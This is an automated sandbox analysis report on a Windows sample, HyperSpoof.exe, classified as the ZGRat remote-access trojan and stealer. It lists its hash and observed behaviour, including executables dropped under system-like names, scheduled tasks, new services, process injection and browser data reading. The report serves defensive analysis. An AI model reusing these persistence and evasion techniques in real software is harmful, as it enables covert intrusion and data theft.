Malware Analysis Report

2024-11-30 20:07

Sample ID 240509-bpy3mach69
Target HyperSpoof.exe
SHA256 71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e
Tags
zgrat evasion execution persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e

Threat Level: Known bad

The file HyperSpoof.exe was found to be: Known bad.

Malicious Activity Summary

zgrat evasion execution persistence rat spyware stealer

ZGRat

Detect ZGRat V1

Process spawned unexpected child process

Nirsoft

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Stops running service(s)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Creates new service(s)

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Maps connected drives based on registry

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Checks SCSI registry key(s)

Runs ping.exe

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 01:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 01:19

Reported

2024-05-09 01:21

Platform

win7-20240508-en

Max time kernel

70s

Max time network

70s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

ZGRat

rat zgrat

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.conhostsft.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A N/A N/A
N/A N/A C:\ProgramData\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\VC_redist.x64.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3024 set thread context of 604 N/A C:\ProgramData\VC_redist.x64.exe C:\Windows\system32\conhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\f3b6ecef712a24 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Windows Defender\fr-FR\lsass.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Windows Defender\fr-FR\6203df4a6bafc7 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.app.log C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a7fb12afa1da01 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
